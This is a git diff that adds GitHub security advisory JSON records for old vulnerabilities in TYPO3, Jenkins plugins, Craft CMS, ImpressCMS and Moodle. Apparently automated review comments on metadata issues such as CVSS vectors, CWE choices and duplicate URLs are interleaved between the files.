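Review bot: The third hunk of GHSA-2pw2-qpcp-m47x adds `https://www.silverstripe.org/download/security-releases/cve-2020-9311/`, which differs from the already-present `https://www.silverstripe.org/download/security-releases/CVE-2020-9311` only by case and a trailing slash; unless the two resolve to different pages, this is a duplicate reference. If the lower-case form is the canonical one, replacing the existing entry is cleaner than listing both. The first hunk's new `silverstripe/framework` range (`3.0.0` to `3.7.5`) sits beside an existing `affected` entry whose package is outside this view; it is worth checking that the two do not describe the same package twice.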
diff --git a/advisories/github-reviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json b/advisories/github-reviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json
new file mode 100644
index 0000000000000..9a12bd0225ca8
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2q2r-xgj5-h3hm",
+ "modified": "2024-02-08T22:03:51Z",
+ "published": "2022-05-02T03:48:54Z",
+ "aliases": [
+ "CVE-2009-3821"
+ ],
+ "summary": "Apache Solr Search for TYPO3 vulnerable to Cross-site Scripting",
+ "details": "Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "apache-solr-for-typo3/solr"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.0.1"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.0.0"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3821"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/TYPO3-Solr/ext-solr/commit/5192f489a13ff9417d7b57c63420187789beea5b"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/TYPO3-Solr/ext-solr"
+ },
+ {
+ "type": "WEB",
+ "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-014/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T22:03:51Z",
+ "nvd_published_at": "2009-10-28T10:30:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json b/advisories/github-reviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json
new file mode 100644
index 0000000000000..61d73b35bb61e
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2r46-cwgm-vvjx",
+ "modified": "2024-01-30T21:44:05Z",
+ "published": "2022-05-13T01:15:04Z",
+ "aliases": [
+ "CVE-2019-10279"
+ ],
+ "summary": "Missing permission check in Jenkins jenkins-reviewbot Plugin",
+ "details": "A missing permission check in Jenkins jenkins-reviewbot Plugin in the ReviewboardDescriptor#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:jenkins-reviewbot"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "2.4.6"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10279"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1091"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/107790"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:44:05Z",
+ "nvd_published_at": "2019-04-04T16:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json b/advisories/github-reviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json new file mode 100644 index 0000000000000..19329e3b396c9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json 
@@ -0,0 +1,127 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2wgg-c8xc-7gg3",
+ "modified": "2024-02-08T21:36:52Z",
+ "published": "2022-05-02T03:46:56Z",
+ "aliases": [
+ "CVE-2009-3628"
+ ],
+ "summary": "TYPO3 Backend Discloses Encryption Key",
+ "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote authenticated users to determine an encryption key via crafted input to a tt_content form element.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-backend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "4.0.13"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-backend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.1.0"
+ },
+ {
+ "fixed": "4.1.13"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-backend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.2.0"
+ },
+ {
+ "fixed": "4.2.10"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-backend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.3alpha1"
+ },
+ {
+ "fixed": "4.3beta2"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3628"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53917"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/TYPO3-CMS/backend"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801"
+ },
+ {
+ "type": "WEB",
+ "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2"
+ },
+ {
+ "type": "WEB",
+ "url":
"http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T21:36:52Z",
+ "nvd_published_at": "2009-11-02T15:30:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json b/advisories/github-reviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json new file mode 100644
index 0000000000000..2aa0c8bd581a5
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-33jj-92px-m4g7",
+ "modified": "2024-02-01T21:17:50Z",
+ "published": "2022-05-24T17:45:29Z",
+ "aliases": [
+ "CVE-2020-19626"
+ ],
+ "summary": "Craft CMS Cross-site Scripting Vulnerability",
+ "details": "Cross Site Scripting (XSS) vulnerability in craftcms 3.1.31, allows remote attackers to inject arbitrary web script or HTML, via `/admin/settings/sites/new`.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "craftcms/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.1.33"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19626"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/craftcms/cms/commit/76a2168b6a5e30144f5c06da4ff264f4eca577ff"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20211209121705/http://mayoterry.com/file/cve/XSS_vuluerability_in_Craftcms_3.1.31.pdf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-01T21:17:50Z",
+ "nvd_published_at": "2021-03-26T15:15:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json b/advisories/github-reviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json new file mode 100644
index 0000000000000..01959cfb2a427
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3858-58w9-wpcg",
+ "modified": "2024-01-30T22:28:39Z",
+ "published": "2022-05-13T01:31:34Z",
+ "aliases": [
+ "CVE-2019-1003021"
+ ],
+ "summary": "Jenkins OpenId Connect Authentication Plugin showed plain text client secret in configuration form",
+ "details": "An exposure of sensitive information vulnerability exists in Jenkins OpenId Connect Authentication Plugin 1.4 and earlier in OicSecurityRealm/config.jelly that allows attackers able to view a Jenkins administrator's web browser output, or control the browser (e.g. malicious extension) to retrieve the configured client secret.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:oic-auth"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.5"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.4"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003021"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-886"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:28:39Z",
+ "nvd_published_at": "2019-02-06T16:29:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json b/advisories/github-reviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json new file mode 100644
index 0000000000000..77219359d5760
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3892-qqv6-h2qm",
+ "modified": "2024-01-30T22:42:18Z",
+ "published": "2022-05-14T03:18:39Z",
+ "aliases": [
+ "CVE-2018-1000177"
+ ],
+ "summary": "Stored XSS vulnerability in Jenkins S3 Publisher Plugin",
+ "details": "A cross-site scripting vulnerability exists in Jenkins S3 Plugin 0.10.12 and older in src/main/resources/hudson/plugins/s3/S3ArtifactsProjectAction/jobMain.jelly that allows attackers able to control file names of uploaded files to define file names containing JavaScript that would be executed in another user's browser when that user performs some UI actions.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:s3"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.11.0"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.10.12"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000177"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2018-04-16/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:42:10Z",
+ "nvd_published_at": "2018-05-08T15:29:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json b/advisories/github-reviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json new file mode 100644
index 0000000000000..faba0e4a1943c
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json
@@ -0,0 +1,70 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-39vm-rvwh-q86j",
+ "modified": "2024-02-07T22:52:33Z",
+ "published": "2022-05-14T02:42:14Z",
+ "aliases": [
+ "CVE-2010-4616"
+ ],
+ "summary": "ImpressCMS Cross-site Scripting vulnerability via quicksearch_ContentContent parameter",
+ "details": "Cross-site scripting (XSS) vulnerability in modules/content/admin/content.php in ImpressCMS 1.2.3 Final, and possibly other versions before 1.2.4, allows remote attackers to inject arbitrary web script or HTML via the quicksearch_ContentContent parameter.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "impresscms/impresscms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.2.4"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4616"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/ImpressCMS/impresscms"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20101223135531/http://secunia.com/advisories/42695"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20201209001614/http://www.securityfocus.com/archive/1/515397/100/0/threaded"
+ },
+ {
+ "type": "WEB",
+ "url": "http://community.impresscms.org/modules/smartsection/item.php?itemid=525"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.htbridge.ch/advisory/xss_vulnerability_in_impresscms.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-07T22:52:33Z",
+ "nvd_published_at": "2010-12-29T22:33:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json b/advisories/github-reviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json new file mode 100644
index 0000000000000..2bbebf827fea9
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3ccq-gccx-pm7j",
+ "modified": "2024-01-30T21:54:16Z",
+ "published": "2022-05-13T01:18:46Z",
+ "aliases": [
+ "CVE-2018-1000425"
+ ],
+ "summary": "Jenkins SonarQube Scanner Plugin stored server authentication token in plain text",
+ "details": "An insufficiently protected credentials vulnerability exists in Jenkins SonarQube Scanner Plugin 2.8 and earlier in SonarInstallation.java that allows attackers with local file system access to obtain the credentials used to connect to SonarQube.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:sonar"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.8.1"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 2.8"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000425"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1163"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/106532"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-522"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:54:16Z",
+ "nvd_published_at": "2019-01-09T23:29:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json b/advisories/github-reviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json new file mode 100644
index 0000000000000..9572327d864ce
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json
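Review bot: The CVSS vector `CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` in the `severity` entry of GHSA-3ccq-gccx-pm7j asserts full integrity and availability impact, while the `details` text and `CWE-522` describe only disclosure of a stored token to someone who already has local file-system access. The sibling Jenkins plaintext-credential advisories added in the same commit (GHSA-3fpx-g9h3-hh8x, GHSA-3q6p-r6rr-266x) carry `C:H/I:N/A:N` for the same flaw class, so this vector looks carried over from the NVD score rather than reassessed. If `database_specific.severity` is meant to reflect the GitHub review, the vector and `"severity": "HIGH"` should be reconciled with the other two entries.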
@@ -0,0 +1,127 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3cqw-pxgr-jhrm",
+ "modified": "2024-02-08T21:38:02Z",
+ "published": "2022-05-02T03:46:56Z",
+ "aliases": [
+ "CVE-2009-3631"
+ ],
+ "summary": "TYPO3 Backend Command Injection via Shell Metacharacters in Uploaded File Name",
+ "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2, when the DAM extension or ftp upload is enabled, allows remote authenticated users to execute arbitrary commands via shell metacharacters in a filename.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-backend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "4.0.13"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-backend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.1.0"
+ },
+ {
+ "fixed": "4.1.13"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-backend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.2.0"
+ },
+ {
+ "fixed": "4.2.10"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-backend"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.3alpha1"
+ },
+ {
+ "fixed": "4.3beta2"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3631"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53923"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/TYPO3-CMS/backend"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801"
+ },
+ {
+ "type": "WEB",
+ "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2"
+ },
+ {
"type": "WEB",
+ "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T21:38:01Z",
+ "nvd_published_at": "2009-11-02T15:30:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json b/advisories/github-reviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json new file mode 100644
index 0000000000000..98e1584833d6b
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json
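Review bot: `cwe_ids` for GHSA-3cqw-pxgr-jhrm is `CWE-94`, but the `details` and `summary` describe command execution through shell metacharacters in a filename, which is the OS command injection weakness rather than generic code injection; if the CWE is meant to be the most specific one, `"CWE-78"` fits the text better (listing both is also an option). The reference `http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/` points at the same bulletin that GHSA-2wgg-c8xc-7gg3 in this commit records without the trailing slash; using one form in both advisories keeps URL-based de-duplication working. The file starts in the previous hunk line, so the `affected` ranges above are reviewed only as far as they are visible here.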
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3fpx-g9h3-hh8x",
+ "modified": "2024-01-30T21:17:55Z",
+ "published": "2022-05-24T22:00:44Z",
+ "aliases": [
+ "CVE-2019-10430"
+ ],
+ "summary": "Jenkins NeuVector Vulnerability Scanner Plugin stored credentials in plain text ",
+ "details": "Jenkins NeuVector Vulnerability Scanner Plugin 1.5 and earlier stored credentials unencrypted in its global configuration file on the Jenkins master where they could be viewed by users with access to the master file system.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "io.jenkins.plugins:neuvector-vulnerability-scanner"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.6"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.5"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10430"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1504"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-312"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:17:55Z",
+ "nvd_published_at": "2019-09-25T16:15:00Z"
+ }
+} \ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json b/advisories/github-reviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json new file mode 100644
index 0000000000000..4cfd5bd28d161
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json
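Review bot: The `summary` of GHSA-3fpx-g9h3-hh8x ends in a trailing space (`"... stored credentials in plain text "`), and the same trailing space appears in the summaries of GHSA-3gm8-32vv-q8mp and GHSA-3mqf-fwc6-vwqw added by this commit. A title with trailing whitespace is rendered verbatim by consumers and defeats exact-match comparisons against the same advisory in other feeds, so all three should be trimmed, e.g. `"summary": "Jenkins NeuVector Vulnerability Scanner Plugin stored credentials in plain text",`.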
@@ -0,0 +1,141 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3gm8-32vv-q8mp",
+ "modified": "2024-02-07T22:53:57Z",
+ "published": "2022-05-13T01:13:04Z",
+ "aliases": [
+ "CVE-2010-2230"
+ ],
+ "summary": "Moodle Cross-site Scripting vulnerability in the KSES text cleaning filter ",
+ "details": "The KSES text cleaning filter in lib/weblib.php in Moodle before 1.8.13 and 1.9.x before 1.9.9 does not properly handle vbscript URIs, which allows remote authenticated users to conduct cross-site scripting (XSS) attacks via HTML input.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "moodle/moodle"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.8.13"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "moodle/moodle"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "1.9.0"
+ },
+ {
+ "fixed": "1.9.9"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2230"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/moodle/moodle/commit/704c5dfed4f4531b6d74d19cfad573984e74885e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=605809"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/moodle/moodle"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20100621005117/http://secunia.com/advisories/40248"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20100711044720/http://secunia.com/advisories/40352"
+ },
+ {
+ "type": "WEB",
+ "url": "http://cvs.moodle.org/moodle/lib/weblib.php?r1=1.812.2.114&r2=1.812.2.115"
+ },
+ {
+ "type": "WEB",
+ "url": "http://cvs.moodle.org/moodle/lib/weblib.php?r1=1.970.2.171&r2=1.970.2.172"
+ },
+ {
+ "type": "WEB",
+ "url": "http://docs.moodle.org/en/Moodle_1.8.13_release_notes"
+ },
+ {
+ "type": "WEB",
+ "url":
"http://docs.moodle.org/en/Moodle_1.9.9_release_notes"
+ },
+ {
+ "type": "WEB",
+ "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043285.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043291.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043340.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://lists.opensuse.org/opensuse-security-announce/2010-08/msg00001.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://moodle.org/mod/forum/discuss.php?d=152368"
+ },
+ {
+ "type": "WEB",
+ "url": "http://tracker.moodle.org/browse/MDL-22042"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2010/06/21/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.vupen.com/english/advisories/2010/1530"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.vupen.com/english/advisories/2010/1571"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-07T22:53:57Z",
+ "nvd_published_at": "2010-06-28T17:30:00Z"
+ }
+} \ No newline at end of file
